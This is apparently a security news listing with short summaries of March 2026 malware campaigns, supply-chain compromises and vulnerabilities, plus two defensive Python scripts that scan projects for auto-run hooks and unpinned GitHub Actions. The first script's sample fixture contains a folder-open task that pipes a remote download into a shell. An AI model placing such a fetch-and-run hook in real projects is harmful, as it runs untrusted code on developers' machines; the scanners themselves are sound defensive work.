ALL POSTS
GlassWorm Malware Leverages Solana Blockchain for Command Delivery and Data Exfiltration
Key Findings
* GlassWorm campaign evolved to deliver multi-stage malware framework with data theft and remote access capabilities
* Operators use Solana blockchain transactions as dead drop resolvers to hide command-and-control infrastructure
* Malware includes hardware wallet phishing targeting Ledger and Trezor devices with fake recovery phrase prompts
* Chrome extension masquerading as "Google Docs Offline" steals browser data, cookies, and monitors cryptocurrency exchange session
Mar 25 · 3 min read
FCC Bans New Foreign-Made Routers Due to Supply Chain and Cyber Security Risks
Key Findings
* FCC bans all new foreign-made consumer routers from U.S. market effective immediately unless granted Conditional Approval by DoD or DHS
* Foreign routers pose unacceptable supply chain vulnerabilities and severe cybersecurity risks to critical infrastructure and American citizens
* Chinese state-sponsored actors including Volt Typhoon, Flax Typhoon, and Salt Typhoon have exploited compromised foreign routers to target U.S. critical infrastructure
* Ban applies only to
Mar 25 · 2 min read
Ghost Campaign: Malicious npm Packages Target Crypto Wallets and Credentials Through Deceptive Installation Methods
Key Findings
* Seven malicious npm packages tracked as "Ghost campaign" designed to steal cryptocurrency wallets and credentials
* Packages use sophisticated social engineering tactics including fake installation logs and sudo password phishing
* Attack chain culminates in remote access trojan capable of harvesting sensitive data and awaiting attacker commands
* Activity shares overlap with GhostClaw campaign, suggesting possible connection between threat actors
* Packages published un
Mar 25 · 3 min read
Fake Resumes and Malicious npm Packages: New Attack Vector Targeting Enterprise Credentials and Crypto Assets
Key Findings
* Campaign named FAUX#ELEVATE targets French-speaking corporate environments using fake resume documents delivered via phishing emails
* Heavily obfuscated VBScript files contain only 266 lines of executable code out of 224,471 total lines, with the rest being junk comments to evade detection
* Attack completes full infection chain in approximately 25 seconds, from initial execution through credential exfiltration
* Malware exclusively targets domain-joined enterprise ma
Mar 24 · 3 min read
Citrix NetScaler Critical Vulnerability Enables Unauthenticated Data Leaks - Immediate Patching Required
Key Findings
* Citrix released patches for two critical NetScaler vulnerabilities affecting ADC and Gateway products
* CVE-2026-3055 (CVSS 9.3) is a memory overread flaw allowing unauthenticated attackers to leak sensitive data from appliance memory
* Vulnerability only affects systems configured as SAML Identity Providers, not default configurations
* CVE-2026-4368 (CVSS 7.7) is a race condition causing session mix-ups in gateway and AAA server deployments
* No public exploits current
Mar 24 · 2 min read
Russian Hacker Sentenced to 6.75 Years for $9 Million Ransomware Campaign
Key Findings
* 26-year-old Russian citizen Aleksei Olegovich Volkov sentenced to 81 months in prison for ransomware facilitation
* Volkov operated as initial access broker, providing unauthorized network access to ransomware groups including Yanluowang
* Facilitated dozens of attacks causing over $9 million in confirmed losses and $24 million in intended losses
* Arrested in Italy January 2024, extradited to U.S., pleaded guilty November 2025
* Must pay $9.1 million in restitution to v
Mar 24 · 2 min read
AI-Powered Phishing Campaign Breaches Hundreds of Organizations Worldwide
Key Findings
* Hundreds of organizations compromised through AI-generated phishing campaign leveraging Railway cloud platform
* Attackers achieved massive scale increase starting March 3, with 50+ new compromises daily as of late March
* Campaign abuses Microsoft device authentication flow, granting attackers 90-day OAuth tokens without the attacker ever needing the victim's password or MFA
* Affected sectors include construction, law, nonprofits, real estate, manufacturing, finance, healthcare, and government
* Huntress identifie
Mar 24 · 3 min read
We Discovered Eight Attack Vectors in AWS Bedrock. Here's What Attackers Could Do With Them
Key Findings
* Eight validated attack vectors discovered across AWS Bedrock environments, spanning log manipulation, knowledge base compromise, agent hijacking, flow injection, guardrail degradation, and prompt poisoning
* Attack chains begin with low-level permissions and escalate to reach critical enterprise assets including Salesforce, SharePoint, Active Directory, and databases
* Knowledge bases and agents represent the highest-value targets due to their direct connectivity to
Mar 24 · 4 min read
North Korean Threat Actors Exploit VS Code Task Automation for StoatWaffle Malware Deployment
Key Findings
* North Korean threat actors tracked as WaterPlum are distributing StoatWaffle malware through malicious VS Code projects using the "tasks.json" auto-run feature
* The malware automatically executes when any file in a project folder is opened, with downloads occurring regardless of operating system
* StoatWaffle includes a credential stealer targeting browsers and a remote access trojan for command execution
* Attackers are targeting senior engineers, CTOs, and founders
Mar 23 · 3 min read
Operation Alice: Police Dismantle 373,000 Dark Web Sites in Massive CSAM Crackdown
Key Findings
* Single operator in China ran 373,000 fraudulent dark web sites offering CSAM and cybercrime services
* Operation Alice, led by German authorities with support from 23 countries, dismantled the network from March 9-19, 2026
* Law enforcement seized 105 servers, identified 440 customers worldwide, and issued international arrest warrant for 35-year-old suspect
* Operator earned over €345,000 from roughly 10,000 customers through fake "packages" priced between €17 and €21
Mar 23 · 4 min read
Beers with Talos: 2025 Year in Review - Speed, Scale, and Staying Power
Key Findings
* Exploitation velocity doubled in 2025, with new vulnerabilities weaponized within days while decade-old CVEs remain reliably exploited
* Identity systems became the primary attack surface, with compromised credentials enabling stealthy lateral movement and environment-wide control
* Approximately 25% of top exploited vulnerabilities targeted shared frameworks and libraries, amplifying blast radius across industries
* APT investigations and ransomware operations increas
Mar 23 · 2 min read
CISA Adds Apple, Laravel Livewire, and Craft CMS Vulnerabilities to Known Exploited List
Key Findings
* CISA added five critical vulnerabilities to its Known Exploited Vulnerabilities catalog, including three Apple flaws, one Craft CMS code injection, and one Laravel Livewire vulnerability
* Three Apple vulnerabilities are linked to active exploitation by the DarkSword iOS exploit kit
* Craft CMS flaws have been actively exploited in the wild to breach servers and steal data
* Laravel Livewire vulnerability is associated with Iran-nexus APT group MuddyWater
* Federal agenc
Mar 23 · 2 min read
Russian Intelligence Suspected in WhatsApp and Signal Phishing Campaign Targeting Mass Users
Key Findings
* Russian Intelligence Services-linked actors are conducting phishing campaigns targeting Signal and WhatsApp accounts of high-value targets including U.S. government officials, military personnel, politicians, and journalists
* Thousands of accounts have already been compromised worldwide through these operations
* Attackers bypass encryption by hijacking accounts rather than breaking encryption itself, using phishing to trick users into sharing verification codes or
Mar 22 · 3 min read
Oracle Releases Emergency Patch for Critical RCE Vulnerability CVE-2026-21992 in Identity Manager
Key Findings
* Oracle released an emergency patch for CVE-2026-21992, a critical remote code execution vulnerability in Identity Manager and Web Services Manager
* The flaw has a CVSS score of 9.8 and requires no authentication, allowing attackers to execute code over HTTP
* Affected versions are Identity Manager 12.2.1.4.0 and 14.1.2.1.0, plus Web Services Manager versions 12.2.1.4.0 and 14.1.2.1.0
* Oracle classified the vulnerability as "easily exploitable" with low complexity
* No
Mar 22 · 2 min read
FBI Warns: Russian Hackers Targeting Secure Messaging Apps
Key Findings
* Russian-aligned hackers targeting commercial messaging apps
* Phishing campaigns compromising thousands of high-value accounts
* Attacks do not break encryption, but exploit social engineering
* Targets include government officials, military personnel, journalists
* Methods involve tricking users into sharing verification codes or clicking malicious links
Background
Russian state-affiliated threat actors are conducting sophisticated phishing campaigns against p
Mar 22 · 1 min read
Trivy Supply Chain Attack Triggers Self-Spreading CanisterWorm Across 47 npm Packages
Key Findings
* TeamPCP cybercriminal group suspected behind supply chain attack
* 47 npm packages compromised across multiple scopes
* Self-propagating CanisterWorm uses ICP blockchain canister as command-and-control infrastructure
* Attack leverages npm package postinstall hooks to execute malware
* Worm can automatically spread using stolen npm authentication tokens
* Decentralized C2 infrastructure makes takedown efforts difficult
Background
The supply chain attack targets
Mar 21 · 2 min read
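The VS Code tasks.json auto-run abuse in the StoatWaffle item above and the npm postinstall hooks in the CanisterWorm and Ghost campaign items share one defensive check: look for auto-execution hooks in a project before opening it in an editor or running `npm install`. The scanner below is an added example written for this page, not code from any of the reports or from the projects involved. It relies on two documented mechanisms, VS Code's `"runOptions": {"runOn": "folderOpen"}` task setting and npm's install-time lifecycle script names (preinstall, install, postinstall, prepare); the sample project it builds in a temp directory is constructed, and the URL in it is a reserved placeholder.

```python
"""Scan a checked-out project for files that run code automatically when the
folder is opened in VS Code or when `npm install` runs.

Added example for this page; not code from the StoatWaffle or CanisterWorm
reports. The sample tree built by demo_tree() is constructed.
"""
import json
import os
import re
import tempfile
from pathlib import Path

# npm runs these during `npm install` unless --ignore-scripts is set.
NPM_LIFECYCLE = ("preinstall", "install", "postinstall", "prepare")


def load_jsonc(path):
    """Parse JSON, tolerating the // line comments and trailing commas that
    VS Code accepts in tasks.json. Only whole-line comments are stripped, so a
    // inside a string on a code line (e.g. a URL) is left intact."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        text = re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)
        text = re.sub(r",(\s*[}\]])", r"\1", text)
        return json.loads(text)


def vscode_autorun_tasks(tasks_json):
    """Describe every task VS Code would start when the folder is opened."""
    hits = []
    for task in load_jsonc(tasks_json).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            cmd = " ".join([str(task.get("command", ""))]
                           + [str(a) for a in task.get("args", [])])
            hits.append(f"task {task.get('label', '?')!r} runs on folderOpen: {cmd}")
    return hits


def npm_lifecycle_scripts(package_json):
    """List the install-time lifecycle scripts declared in a package.json."""
    scripts = load_jsonc(package_json).get("scripts") or {}
    return [f"{name}: {scripts[name]}" for name in NPM_LIFECYCLE if name in scripts]


def scan_tree(root):
    """Walk a project (node_modules included, since installed dependencies
    carry their own package.json) and collect every auto-execution hook."""
    root = Path(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != ".git"]
        here = Path(dirpath)
        for name in filenames:
            path = here / name
            rel = path.relative_to(root).as_posix()
            try:
                if name == "tasks.json" and here.name == ".vscode":
                    for hit in vscode_autorun_tasks(path):
                        findings.append({"path": rel, "kind": "vscode-folderOpen", "detail": hit})
                elif name == "package.json":
                    for hit in npm_lifecycle_scripts(path):
                        findings.append({"path": rel, "kind": "npm-lifecycle", "detail": hit})
            except (json.JSONDecodeError, OSError) as exc:
                # A file we cannot parse still deserves a look; report it rather than skip it.
                findings.append({"path": rel, "kind": "unparseable", "detail": str(exc)})
    return sorted(findings, key=lambda f: (f["path"], f["detail"]))


def demo_tree():
    """Build a constructed sample project in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / ".vscode").mkdir()
        (root / ".vscode" / "tasks.json").write_text(
            "{\n"
            "  // constructed sample: one auto-run task, one ordinary build task\n"
            '  "version": "2.0.0",\n'
            '  "tasks": [\n'
            '    {"label": "setup", "type": "shell", "command": "sh",\n'
            '     "args": ["-c", "curl -s https://example.invalid/stage1 | sh"],\n'
            '     "runOptions": {"runOn": "folderOpen"}},\n'
            '    {"label": "build", "type": "shell", "command": "npm", "args": ["run", "build"]},\n'
            "  ]\n"
            "}\n",
            encoding="utf-8",
        )
        (root / "package.json").write_text(
            json.dumps({"name": "sample-app",
                        "scripts": {"build": "tsc", "postinstall": "node setup.js"}}),
            encoding="utf-8",
        )
        dep = root / "node_modules" / "clean-lib"
        dep.mkdir(parents=True)
        (dep / "package.json").write_text(
            json.dumps({"name": "clean-lib", "scripts": {"test": "jest"}}), encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo_tree():
        print(f"{f['kind']:18} {f['path']}: {f['detail']}")
```

Run `scan_tree()` against a fresh clone before opening it. Two caveats: VS Code only starts a folderOpen task when the workspace is trusted and automatic tasks are allowed, so a hit means the project is asking for execution, not that it has already happened; and `npm install --ignore-scripts` suppresses lifecycle scripts, but a package that genuinely needs a postinstall step will then be left half-built, so the finding should be reviewed rather than blindly blocked.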
Critical Langflow Vulnerability CVE-2026-33017 Sparks Rapid Exploitation Within Hours
Key Findings
* Critical remote code execution vulnerability in Langflow (CVE-2026-33017)
* CVSS score: 9.3
* Exploited within 20 hours of advisory publication
* Allows unauthenticated remote code execution via API endpoint
* Affects all Langflow versions prior to 1.8.1
* Attackers can execute arbitrary Python code with full server privileges
* Observed exploitation includes credential harvesting and potential supply chain compromise
Background
Langflow, an open-source AI plat
Mar 21 · 2 min read
Trivy Security Scanner GitHub Actions Breach: 75 Tags Hijacked for CI/CD Secret Theft
Key Findings
* Trivy GitHub Actions repositories compromised for second time in a month
* 75 out of 76 version tags force-pushed with malicious payload
* Attacker aims to steal CI/CD secrets including cloud credentials, cryptocurrency wallets
* Likely perpetrated by TeamPCP threat actor group
* Compromise stems from incomplete mitigation of previous security incident
Background
The Trivy vulnerability scanner, maintained by Aqua Security, has experienced a significant securit
Mar 20 · 2 min read
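Force-pushing 75 of 76 version tags means every workflow that referenced the action by tag picked up the replaced payload on its next run, while a workflow pinned to a full commit SHA kept resolving the original commit. The check a practitioner wants after this kind of incident is whether their own workflows reference any action or reusable workflow by a mutable tag or branch instead of a SHA. The audit below is an added example for this page, not code from the advisory or from Aqua Security. It parses `uses:` lines with a regular expression so it needs no YAML library; the workflow text it scans is constructed, and the 40-character SHA in it is a placeholder, not a real commit.

```python
"""Audit GitHub Actions workflow text for actions referenced by mutable tag or
branch rather than by full commit SHA.

Added example for this page, not code from the Trivy advisory. SAMPLE_WORKFLOW
is constructed and the SHA in it is a placeholder.
"""
import re

# A `uses:` line, either as a step (`- uses:`) or at job level for a reusable
# workflow. Group 1 is the reference, group 2 an optional trailing comment
# (the convention is to note the human-readable version next to a SHA pin).
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)['\"]?\s*(#.*)?$", re.MULTILINE)
# Full git object ids: 40 hex (SHA-1) or 64 hex (SHA-256 repositories).
SHA_RE = re.compile(r"^(?:[0-9a-f]{40}|[0-9a-f]{64})$")


def classify_ref(ref):
    """'sha' for an immutable commit id, otherwise 'mutable' (tag or branch)."""
    return "sha" if SHA_RE.match(ref) else "mutable"


def audit_workflow(text):
    """Return one finding per remote action reference in the workflow text."""
    findings = []
    for m in USES_RE.finditer(text):
        spec, comment = m.group(1), m.group(2) or ""
        if spec.startswith("./") or spec.startswith("docker://"):
            continue  # local actions and container images are outside this check
        if "@" not in spec:
            findings.append({"action": spec, "ref": None, "pin": "missing", "comment": ""})
            continue
        name, ref = spec.rsplit("@", 1)
        findings.append({
            "action": name,
            "ref": ref,
            "pin": classify_ref(ref),
            "comment": comment.lstrip("#").strip(),
        })
    return findings


def unpinned(text):
    """Only the references that a tag force-push could silently change."""
    return [f for f in audit_workflow(text) if f["pin"] != "sha"]


# Constructed sample workflow. The SHA on the checkout step is a placeholder.
SAMPLE_WORKFLOW = """\
name: ci
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567 # v4 (placeholder SHA)
      - uses: aquasecurity/trivy-action@master
      - name: Node
        uses: 'actions/setup-node@v4'
      - uses: ./.github/actions/local-helper
      - uses: docker://alpine:3.20
      - run: echo "uses: not-a-step@v1"
  lint:
    uses: octo-org/shared/.github/workflows/lint.yml@main
"""


if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        flag = "OK " if f["pin"] == "sha" else "!! "
        print(f"{flag}{f['action']}@{f['ref']}  ({f['pin']}) {f['comment']}")
```

Point `audit_workflow()` at each file under `.github/workflows/` and treat every `mutable` finding as work: replace the tag with the commit it currently resolves to and keep the version in the trailing comment so Dependabot or Renovate can still bump it. A SHA pin protects against a moved tag, not against a malicious commit you chose to pin, so the upgrade step still needs review.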
US Disrupts Global Botnet Networks Hijacking Millions of Devices
Key Findings
* Justice Department disrupted four botnets affecting 3 million devices
* Botnets responsible for over 300,000 DDoS attacks
* Infected devices include digital video recorders, web cameras, Wi-Fi routers, and TV boxes
* Operation involved international cooperation with Canada and Germany
* Botnets used for various cybercrime activities including extortion
Background
The Justice Department conducted a major cybersecurity operation targeting four significant botnets: Aisuru,
Mar 20 · 2 min read
Apple Warns iPhone Users to Update iOS Against Emerging Exploit Kits
Key Findings
* Coruna and DarkSword exploit kits target outdated iOS versions
* Apple warns users to update iOS to prevent data theft
* Exploit kits can compromise iPhones through malicious web content
* Devices running latest iOS versions are protected
* Multiple threat actors are utilizing these exploit techniques
Background
Apple has identified significant security vulnerabilities in older iOS versions that can be exploited by sophisticated web-based attack frameworks. The
Mar 20 · 1 min read